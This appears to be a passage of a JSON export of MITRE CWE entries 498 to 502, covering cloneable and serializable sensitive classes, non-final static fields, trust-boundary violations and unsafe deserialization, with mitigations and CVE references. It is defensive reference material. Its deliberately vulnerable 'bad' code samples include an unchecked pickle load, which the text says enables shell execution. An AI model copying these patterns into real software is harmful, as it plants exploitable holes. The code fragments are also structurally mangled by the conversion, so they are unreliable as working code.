Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"System Information Leak","attr":{"@_Date":"2008-04-11"}},{"#text":"Information Leak of System Data","attr":{"@_Date":"2009-12-28"}},{"#text":"Exposure of System Data to an Unauthorized Control Sphere","attr":{"@_Date":"2020-02-24"}}]}},"498":{"attr":{"@_ID":"498","@_Name":"Cloneable Class Containing Sensitive Information","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code contains a class with sensitive data, but the class is cloneable. The data can then be accessed by cloning the class.","Extended_Description":"Cloneable classes are effectively open classes, since data cannot be hidden in them. Classes that do not explicitly deny cloning can be cloned by any other class without running the constructor.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"200","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"A class that can be cloned can be produced without executing the constructor. This is dangerous since the constructor may perform security-related checks. By allowing the object to be cloned, those checks may be bypassed."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"If you do make your classes clonable, ensure that your clone method is final and throw super.clone()."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class CloneClient {}class Teacher implements Cloneable {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public CloneClient() //throwsjava.lang.CloneNotSupportedException {}public static void main(String args[]) {}","xhtml:br":["",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Teacher t1 = new Teacher(\\"guddu\\",\\"22,nagar road\\");//...// Do some stuff to remove the teacher.Teacher t2 = (Teacher)t1.clone();System.out.println(t2.name);","xhtml:br":["","","","",""]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"new CloneClient();","xhtml:br":""}}]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public Object clone() {}public String name;public String clas;public Teacher(String name,String clas) {}","xhtml:br":["","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {}catch (java.lang.CloneNotSupportedException e) {}","xhtml:br":["",""],"xhtml:div":[{"#text":"return super.clone();","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"throw new RuntimeException(e.toString());","xhtml:br":""}}]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"this.name = name;this.clas = clas;","xhtml:br":["",""]}}]}}],"xhtml:br":""}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public final void clone() throws java.lang.CloneNotSupportedException {}","xhtml:div":{"#text":"throw new java.lang.CloneNotSupportedException();","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"Make classes uncloneable by defining a clone function like:"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Information leak through class cloning"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"OBJ07-J","Entry_Name":"Sensitive classes must not let themselves be copied"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Information Leak through Class Cloning","attr":{"@_Date":"2011-03-29"}}}},"499":{"attr":{"@_ID":"499","@_Name":"Serializable Class Containing Sensitive Data","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code contains a class with sensitive data, but the class does not explicitly deny serialization. The data can be accessed by serializing the class through another class.","Extended_Description":"Serializable classes are effectively open classes since data cannot be hidden in them. Classes that do not explicitly deny serialization can be serialized by any other class, which can then in turn use the data stored inside it.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"200","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"an attacker can write out the class to a byte stream, then extract the important data from it."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"In Java, explicitly define final writeObject() to prevent serialization. This is the recommended solution. Define the writeObject() function to throw an exception explicitly denying serialization."},{"Phase":"Implementation","Description":"Make sure to prevent serialization of your objects."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code creates a new record for a medical patient:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"class PatientRecord {}","xhtml:div":{"#text":"private String name;private String socialSecurityNum;public Patient(String name,String ssn) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"this.SetName(name);this.SetSocialSecurityNumber(ssn);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}},"Body_Text":"This object does not explicitly deny serialization, allowing an attacker to serialize an instance of this object and gain a patient\'s name and Social Security number even though those fields are private."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Information leak through serialization"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SER03-J","Entry_Name":"Do not serialize unencrypted, sensitive data"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SER05-J","Entry_Name":"Do not serialize instances of inner classes"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Information Leak through Serialization","attr":{"@_Date":"2008-04-11"}}}},"500":{"attr":{"@_ID":"500","@_Name":"Public Static Field Not Marked Final","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"An object contains a public static field that is not marked final, which might allow it to be modified in unexpected ways.","Extended_Description":"Public static variables can be read without an accessor and changed without a mutator by any classes in the application.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"493","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}]},"Background_Details":{"Background_Detail":"When a field is declared public but not final, the field can be read and written to by arbitrary Java code."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Application Data","Note":"The object could potentially be tampered with."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"The object could potentially allow the object to be read."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Clearly identify the scope for all critical data elements, including whether they should be regarded as static."},{"Phase":"Implementation","Description":{"xhtml:p":["Make any static fields private and constant.","A constant field is denoted by the keyword \'const\' in C/C++ and \' final\' in Java"]}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following examples use of a public static String variable to contain the name of a property/configuration file for the application.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"class SomeAppClass {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public:...","xhtml:br":["",""],"xhtml:div":{"#text":"static string appPropertiesConfigFile = \\"app/properties.config\\";","attr":{"@_style":"margin-left:10px;"}}}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class SomeAppClass {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public static String appPropertiesFile = \\"app/Application.properties\\";...","xhtml:br":["",""]}}}},{"attr":{"@_Nature":"good","@_Language":"C++"},"xhtml:div":{"#text":"class SomeAppClass {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public:...","xhtml:br":["",""],"xhtml:div":{"#text":"static const string appPropertiesConfigFile = \\"app/properties.config\\";","attr":{"@_style":"margin-left:10px;"}}}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class SomeAppClass {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public static final String appPropertiesFile = \\"app/Application.properties\\";...","xhtml:br":["",""]}}}}],"Body_Text":"Having a public static variable that is not marked final (constant) may allow the variable to the altered in a way not intended by the application. In this example the String variable can be modified to indicate a different on nonexistent properties file which could cause the application to crash or caused unexpected behavior."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Overflow of static internal buffer"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"OBJ10-J","Entry_Name":"Do not use public static nonfinal variables"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP28","Entry_Name":"Unexpected access points"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-05","Modification_Comment":"Significant clarification of this entry, and improved examples."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Background_Details, Demonstrative_Examples, Description, Name, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":[{"#text":"Overflow of Static Internal Buffer","attr":{"@_Date":"2008-04-11"}},{"#text":"Static Field Not Marked Final","attr":{"@_Date":"2008-11-24"}}]}},"501":{"attr":{"@_ID":"501","@_Name":"Trust Boundary Violation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product mixes trusted and untrusted data in the same data structure or structured message.","Extended_Description":"A trust boundary can be thought of as line drawn through a program. On one side of the line, data is untrusted. On the other side of the line, data is assumed to be trustworthy. The purpose of validation logic is to allow data to safely cross the trust boundary - to move from untrusted to trusted. A trust boundary violation occurs when a program blurs the line between what is trusted and what is untrusted. By combining trusted and untrusted data in the same data structure, it becomes easier for programmers to mistakenly trust unvalidated data.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code accepts an HTTP request and stores the username parameter in the HTTP session object before checking to ensure that the user has been authenticated.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"usrname = request.getParameter(\\"usrname\\");if (session.getAttribute(ATTR_USR) == null) {}","xhtml:br":"","xhtml:div":{"#text":"session.setAttribute(ATTR_USR, usrname);","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"usrname = request.Item(\\"usrname\\");if (session.Item(ATTR_USR) == null) {}","xhtml:br":"","xhtml:div":{"#text":"session.Add(ATTR_USR, usrname);","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"Without well-established and maintained trust boundaries, programmers will inevitably lose track of which pieces of data have been validated and which have not. This confusion will eventually allow some data to be used without first being validated."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Trust Boundary Violation"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Demonstrative_Example, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"}]}},"502":{"attr":{"@_ID":"502","@_Name":"Deserialization of Untrusted Data","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application deserializes untrusted data without sufficiently verifying that the resulting data will be valid.","Extended_Description":{"xhtml:p":["It is often convenient to serialize objects for communication or to save them for later use. However, deserialized data or code can often be modified without using the provided accessor functions if it does not use cryptography to protect itself. Furthermore, any cryptography would still be client-side security -- which is a dangerous security assumption.","Data that is untrusted can not be trusted to be well-formed.","When developers place no restrictions on \\"gadget chains,\\" or series of instances and method invocations that can self-execute during the deserialization process (i.e., before the object is returned to the caller), it is sometimes possible for attackers to leverage them to perform unauthorized actions, like generating a shell."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"913","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"913","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"915","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Ruby","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Python","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"JavaScript","@_Prevalence":"Undetermined"}}]},"Background_Details":{"Background_Detail":"Serialization and deserialization refer to the process of taking program-internal object-related data, packaging it in a way that allows the data to be externally stored or transferred (\\"serialization\\"), then extracting the serialized data to reconstruct the original object (\\"deserialization\\")."},"Alternate_Terms":{"Alternate_Term":[{"Term":"Marshaling, Unmarshaling","Description":"Marshaling and unmarshaling are effectively synonyms for serialization and deserialization, respectively."},{"Term":"Pickling, Unpickling","Description":"In Python, the \\"pickle\\" functionality is used to perform serialization and deserialization."},{"Term":"PHP Object Injection","Description":"Some PHP application researchers use this term when attacking unsafe use of the unserialize() function; but it is also used for CWE-915."}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":["Modify Application Data","Unexpected State"],"Note":"Attackers can modify unexpected objects or data that was assumed to be safe from modification."},{"Scope":"Availability","Impact":"DoS: Resource Consumption (CPU)","Note":"If a function is making an assumption on when to terminate, based on a sentry in a string, it could easily never terminate."},{"Scope":"Other","Impact":"Varies by Context","Note":"The consequences can vary widely, because it depends on which objects or methods are being deserialized, and how they are used. Making an assumption that the code in the deserialized object is valid is dangerous and can enable exploitation."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Implementation"],"Description":"If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified."},{"Phase":"Implementation","Description":"When deserializing data, populate a new object rather than just deserializing. The result is that the data flows through safe input validation and that the functions are safe."},{"Phase":"Implementation","Description":"Explicitly define a final object() to prevent deserialization."},{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:p":["Make fields transient to protect them from deserialization.","An attempt to serialize and then deserialize a class containing transient fields will result in NULLs where the transient data should be. This is an excellent way to prevent time, environment-based, or sensitive variables from being carried over and used improperly."]}},{"Phase":"Implementation","Description":"Avoid having unnecessary types or gadgets available that can be leveraged for malicious ends. This limits the potential for unintended or unauthorized types and gadgets to be leveraged by the attacker. Add only acceptable classes to an allowlist. Note: new gadgets are constantly being discovered, so this alone is not a sufficient mitigation."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This code snippet deserializes an object from a file and uses it as a UI button:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}","xhtml:div":{"#text":"File file = new File(\\"object.obj\\");ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));javax.swing.JButton button = (javax.swing.JButton) in.readObject();in.close();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"private final void readObject(ObjectInputStream in) throws java.io.IOException {throw new java.io.IOException(\\"Cannot be deserialized\\"); }","xhtml:br":""}}],"Body_Text":["This code does not attempt to verify the source or contents of the file before deserializing it. An attacker may be able to replace the intended file with a file that contains arbitrary malicious code which will be executed when the button is pressed.","To mitigate this, explicitly define final readObject() to prevent deserialization. An example of this is:"]},{"Intro_Text":"In Python, the Pickle library handles the serialization and deserialization processes. In this example derived from [REF-467], the code receives and parses data, and afterwards tries to authenticate a user based on validating a token.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Python"},"xhtml:div":{"#text":"try {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"class ExampleProtocol(protocol.Protocol):def dataReceived(self, data):# Code that would be here would parse the incoming data# After receiving headers, call confirmAuth() to authenticatedef confirmAuth(self, headers):try:token = cPickle.loads(base64.b64decode(headers[\'AuthToken\']))if not check_hmac(token[\'signature\'], token[\'data\'], getSecretKey()):raise AuthFailself.secure_data = token[\'data\']except:raise AuthFail","xhtml:br":["","","","","","","","","","","","",""]}}}},"Body_Text":"Unfortunately, the code does not verify that the incoming data is legitimate. An attacker can construct a illegitimate, serialized object \\"AuthToken\\" that instantiates one of Python\'s subprocesses to execute arbitrary commands. For instance,the attacker could construct a pickle that leverages Python\'s subprocess module, which spawns new processes and includes a number of arguments for various uses. Since Pickle allows objects to define the process for how they should be unpickled, the attacker can direct the unpickle process to call Popen in the subprocess module and execute /bin/sh."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-12799","Description":"chain: bypass of untrusted deserialization issue (CWE-502) by using an assumed-trusted class (CWE-183)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12799"},{"Reference":"CVE-2015-8103","Description":"Deserialization issue in commonly-used Java library allows remote execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8103"},{"Reference":"CVE-2015-4852","Description":"Deserialization issue in commonly-used Java library allows remote execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4852"},{"Reference":"CVE-2013-1465","Description":"Use of PHP unserialize function on untrusted input allows attacker to modify application configuration.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1465"},{"Reference":"CVE-2012-3527","Description":"Use of PHP unserialize function on untrusted input in content management system might allow code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3527"},{"Reference":"CVE-2012-0911","Description":"Use of PHP unserialize function on untrusted input in content management system allows code execution using a crafted cookie value.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0911"},{"Reference":"CVE-2012-0911","Description":"Content management system written in PHP allows unserialize of arbitrary objects, possibly allowing code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0911"},{"Reference":"CVE-2011-2520","Description":"Python script allows local users to execute code via pickled data.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2520"},{"Reference":"CVE-2012-4406","Description":"Unsafe deserialization using pickle in a Python script.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4406"},{"Reference":"CVE-2003-0791","Description":"Web browser allows execution of native methods via a crafted string to a JavaScript function that deserializes the string.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0791"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Deserialization of untrusted data"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SER01-J","Entry_Name":"Do not deviate from the proper signatures of serialization methods"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SER03-J","Entry_Name":"Do not serialize unencrypted, sensitive data"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SER06-J","Entry_Name":"Make defensive copies of private mutable components during deserialization"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SER08-J","Entry_Name":"Do not use the default serialized form for implementation defined invariants"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP25","Entry_Name":"Tainted input to 